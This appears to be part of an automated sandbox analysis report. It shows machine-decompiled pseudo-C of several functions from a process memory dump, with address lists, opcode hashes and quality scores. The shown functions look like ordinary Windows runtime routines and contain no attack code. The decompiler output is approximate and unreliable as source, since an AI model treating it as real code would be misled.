				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01078A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E00FD9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x109b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x00fc0055
0x00fc005d
0x00fc0062
0x00fc006c
0x00fc006f
0x00fc0074
0x00fc007a
0x00fc007a
0x00fc0080
0x00fc0080
0x00fc0087
0x00fc008d
0x00fc008f
0x00fc0093
0x00fc0095
0x00fc009b
0x00fc00f8
0x00fc00fb
0x00fc00fc
0x00fc00ff
0x00fc0108
0x00fc0108
0x00fc00a2
0x00fc00a6
0x00fc00b3
0x00fc00bc
0x00fc00c5
0x00fc00ca
0x0100c01e
0x00000000
0x00000000
0x0100c02d
0x00fc00d5
0x00fc00d9
0x0100c03d
0x0100c046
0x0100c046
0x00fc00df
0x00fc00e2
0x00fc00ea
0x00fc00ef
0x00fc00f2
0x00fc00f6
0x00fc0111
0x00fc0117
0x00fc0117
0x00000000
0x00fc00f6
0x00fc00d0
0x00fc00d0
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6169dd428b7b3abb37dfe5b1fe207805ec5e8c988764c6a0d4cdfb8c2b970517
Instruction ID: 39ff6f6a64f1a5108055aada516460453489f5dd684ca5bfd2ce261feb92d7f1
Opcode Fuzzy Hash: 6169dd428b7b3abb37dfe5b1fe207805ec5e8c988764c6a0d4cdfb8c2b970517
Instruction Fuzzy Hash: 1931CE31641B05CFD726CB28C941F96B3E5FF88724F1885ADE49687790EB35AC02DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01026C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01026C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E00FC7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1097b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L00FC4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E00FEF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E00FC7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E00FE9AE0();
						_t23 = L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x01026c0a
0x01026c0f
0x01026c10
0x01026c13
0x01026c15
0x01026c19
0x01026c1c
0x01026c21
0x01026c28
0x01026c3a
0x01026c2a
0x01026c33
0x01026c33
0x01026c3f
0x01026c48
0x01026c4d
0x01026c60
0x01026c65
0x01026c69
0x01026c73
0x01026c79
0x01026c7f
0x01026c86
0x01026c90
0x01026c94
0x01026ca6
0x01026cb2
0x01026cbd
0x01026cbd
0x01026cc3
0x01026cc7
0x01026ccb
0x01026cd0
0x01026cd1
0x01026ce2
0x01026ce2
0x01026c69
0x01026ced

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98e1aba34c5a49d09e746053c96a7b9dd848b47d1d52cad422e5c04ef2e37d16
Instruction ID: b6f57a27867d53898759b38b93bc5c8543066d61e4a412f7d226efeaefb3173c
Opcode Fuzzy Hash: 98e1aba34c5a49d09e746053c96a7b9dd848b47d1d52cad422e5c04ef2e37d16
Instruction Fuzzy Hash: A721ABB1A00658AFD711EB68DD81F2AB7B8FF48700F1440A9FA49C7791D639ED50CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FE90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00FE90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E00FFD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E00FDE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L00FC4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E00FEF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E00FDA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x00fe90af
0x00fe90b8
0x00fe90bb
0x00fe90bf
0x00fe90c2
0x00fe90c2
0x00fe90c8
0x00fe90cb
0x00fe90cd
0x010214d7
0x010214eb
0x010214eb
0x00000000
0x010214eb
0x010214db
0x010214e6
0x00000000
0x010214f2
0x010214e8
0x00000000
0x010214e8
0x00fe90d8
0x00fe90da
0x00fe90dd
0x00fe90e5
0x00000000
0x00fe9139
0x00fe90fa
0x00fe90fe
0x00fe9142
0x00000000
0x00fe9142
0x00fe9104
0x00fe9107
0x00fe910b
0x00fe9110
0x00fe9118
0x00fe9147
0x00fe9148
0x00fe914f
0x00fe9150
0x00fe9151
0x00fe9152
0x00fe9156
0x00fe915d
0x00fe9160
0x00fe9168
0x00fe916c
0x00fe91bc
0x00fe91be
0x00000000
0x00fe91be
0x00fe916e
0x00fe9173
0x00fe9176
0x00000000
0x00000000
0x00fe917c
0x00fe9180
0x00fe91b5
0x00000000
0x00fe91b5
0x00fe9182
0x00fe9185
0x00fe9189
0x00000000
0x00000000
0x00fe918e
0x00fe9190
0x00fe9198
0x00000000
0x00000000
0x00fe91a0
0x00000000
0x00fe91ad
0x00fe91ad
0x00fe91b0
0x00fe91b1
0x00000000
0x00fe9185
0x00fe911a
0x00fe911c
0x00fe911f
0x00fe9125
0x00fe9127
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 98e27de88075e6e4a3a71887bfd63ce13c76eff83c050f2a350ade6a5faeac79
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: C121AFB2A00255EFDB20DF59C844A6AF7F8EB44310F15886EE989A7201D274AD00ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FD3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00FD3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x10984c4; // 0x0
				_v12 = 1;
				_v8 =  *0x10984c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x10984c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E00FEAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E00FEFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x10984c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x10984c4; // 0x0
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x00fd3b89
0x00fd3b96
0x00fd3ba1
0x00fd3bab
0x00fd3bb5
0x00fd3bb9
0x01016298
0x00fd3bbf
0x00fd3bc2
0x00fd3bc3
0x00fd3bc9
0x00fd3bca
0x00fd3bcc
0x00fd3bcd
0x00fd3bd4
0x00fd3bd6
0x00fd3bdb
0x00fd3bea
0x00fd3bf7
0x00fd3bfb
0x00fd3bff
0x00fd3c09
0x00fd3c0a
0x00fd3c0b
0x00fd3c0f
0x00fd3c14
0x00fd3c18
0x00fd3c18
0x00fd3bfb
0x00fd3c1b
0x00fd3c30
0x00fd3c30
0x00fd3c3d

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 255b238dbc34220bfe2c5c485ff7ca26d95812feb1fcb460bee9c75d1a963bce
Instruction ID: a8455d450c6acfcab801d1f6f0b2490fd4e93b5efb8383b4f641130d04f319de
Opcode Fuzzy Hash: 255b238dbc34220bfe2c5c485ff7ca26d95812feb1fcb460bee9c75d1a963bce
Instruction Fuzzy Hash: 87218072600118AFC710DF58CD92F9AB7BDFF44708F154069E608AB351D776AE01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01026CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01026CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E00FC7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E00FC7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0xf85c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E00FDF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E00FDF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01027016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L00FC2400( &_v52);
								}
								_t21 = L00FC2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x01026cfb
0x01026d00
0x01026d02
0x01026d06
0x01026d0a
0x01026d0e
0x01026d19
0x01026d2b
0x01026d1b
0x01026d24
0x01026d24
0x01026d33
0x01026d39
0x01026d46
0x01026d4f
0x01026d61
0x01026d51
0x01026d5a
0x01026d5a
0x01026d69
0x01026d6b
0x01026d6d
0x01026d6f
0x01026d6f
0x01026d74
0x01026d79
0x01026d7a
0x01026d7f
0x01026d82
0x01026d88
0x01026d89
0x01026d90
0x01026d94
0x01026da7
0x01026db1
0x01026db1
0x01026dbb
0x01026dbb
0x01026d90
0x01026d69
0x01026d46
0x01026dc6

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3ca9086d5fcb30f532e994811534da63c54a180832926544ebb8aed8bbdcb1
Instruction ID: d462948a048e44305585cfcc2a95da5e9525a9df3add8f3651939ffa645169a7
Opcode Fuzzy Hash: ef3ca9086d5fcb30f532e994811534da63c54a180832926544ebb8aed8bbdcb1
Instruction Fuzzy Hash: C121D3729043999BD311EF28C944F6BBBECEF81740F0804AAFD8187252DB35D548C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0107070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0107070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E010707DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0106AFDE( &_v8,  &_v12);
					E01071293(_t38, _v28, _t60);
					if(E00FC7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E010614FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0107071b
0x01070724
0x01070734
0x01070738
0x0107074b
0x0107074b
0x01070753
0x01070753
0x01070759
0x0107075d
0x01070774
0x01070779
0x0107077d
0x01070789
0x01070795
0x010707a7
0x01070797
0x010707a0
0x010707a0
0x010707af
0x010707c4
0x010707cd
0x010707cd
0x010707af
0x010707dc

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: b77ad697df8f1e71edc6a0c82b795a6cc0f7f004696eaadf3e2f65db0b193d2f
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 6321F276B042009FD705DF1CC880BAABBE5FFD5350F048669F9959B385DA30D909CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00FCAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FCAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E00FC7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E00FC7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E00FC7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E00FC7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01027794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x00fcae78
0x00fcae7c
0x00fcae7e
0x00fcae81
0x00fcae86
0x00fcae8d
0x01012691
0x00fcae93
0x00fcae93
0x00fcae93
0x00fcae98
0x00fcae9d
0x010126a2
0x010126b4
0x010126a4
0x010126ad
0x010126ad
0x010126b9
0x00000000
0x010126bb
0x00000000
0x010126bb
0x00fcaea3
0x00fcaea3
0x00fcaea3
0x00fcaeaa
0x010126c0
0x010126c9
0x010126c9
0x00fcaeb3
0x010126d4
0x010126e1
0x00000000
0x00000000
0x010126e7
0x010126ee
0x010126f0
0x010126f9
0x010126f9
0x01012702
0x01012708
0x01012708
0x0101270b
0x0101270f
0x01012711
0x01012711
0x01012725
0x01012725
0x00000000
0x00fcaeb9
0x00fcaeb9
0x00fcaebf
0x00fcaebf
0x00fcaeb3

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: a58f0fe9e37c89fe77af3e613d7405fbb135a13984c3741388938b7572c092d5
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 13212672A05686CFD7129B69CA45F2537E8EF04354F2904E4ED458B392E73CDC40D691

Uniqueness

Uniqueness Score: -1.00%

Function 01027794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01027794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1097b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E00FEF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E00FC7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E00FE9AE0();
					_t24 = L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x01027799
0x0102779a
0x0102779b
0x010277a3
0x010277ab
0x010277ae
0x010277b1
0x010277b1
0x010277bf
0x010277c4
0x010277c8
0x010277ce
0x010277d4
0x010277e0
0x010277e0
0x010277d6
0x010277d6
0x010277de
0x00000000
0x00000000
0x010277de
0x010277e5
0x010277f0
0x010277f3
0x010277f6
0x010277fd
0x01027800
0x0102780c
0x01027818
0x0102782b
0x0102781a
0x01027823
0x01027823
0x01027830
0x01027831
0x01027838
0x0102783d
0x0102783e
0x0102784f
0x0102784f
0x0102785a

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c183205b683f693ea5fbe8c499de99995ce6027396b2df9be801f24260581b
Instruction ID: d984a8a8aef3eaebd21a839ee5818f7593c4bcd6b3cb84a5fc2281175f818677
Opcode Fuzzy Hash: 59c183205b683f693ea5fbe8c499de99995ce6027396b2df9be801f24260581b
Instruction Fuzzy Hash: 62219D72900654ABC725DF69DC91E6BBBA8EF48740F1005ADFA4AD7650D638E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FDFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FDFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E00FB76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x00fdfd9b
0x00fdfda0
0x00fdfda1
0x00fdfdab
0x00fdfdad
0x00fdfdb0
0x00fdfdb8
0x00fdfe0f
0x00fdfde6
0x00fdfde9
0x00fdfdec
0x0101c0c0
0x00fdfdfe
0x00fdfe06
0x00fdfe06
0x0101c0c8
0x00fdfe2d
0x00fdfe2d
0x00000000
0x00fdfe2d
0x0101c0d1
0x0101c0e0
0x0101c0e5
0x0101c0e5
0x0101c0e8
0x00000000
0x0101c0e8
0x00fdfdf4
0x00000000
0x00000000
0x00fdfdf6
0x00fdfdfa
0x00fdfe1a
0x00fdfe1f
0x00fdfe1f
0x00fdfdfc
0x00000000
0x00fdfdfc
0x00fdfdcc
0x00fdfdd0
0x00fdfe26
0x00000000
0x00fdfe26
0x00fdfdd8
0x00fdfddb
0x00fdfddd
0x00fdfde0
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 2788f308a0edd661f6ffc92412125937eb59af0cb4f5e8d584950b084b75c894
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: F0216A72A40A80DFD731CF09C640F66B7E6EB94B20F28857EE94687725D734AD04EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00FA9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x107f708);
				E00FFD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E00FE95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E00FE95D0();
				_t33 =  *0x10984c4; // 0x0
				L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x10984c4; // 0x0
				L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x10984c4; // 0x0
				E00FC2280(L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x10986b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E00FE95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
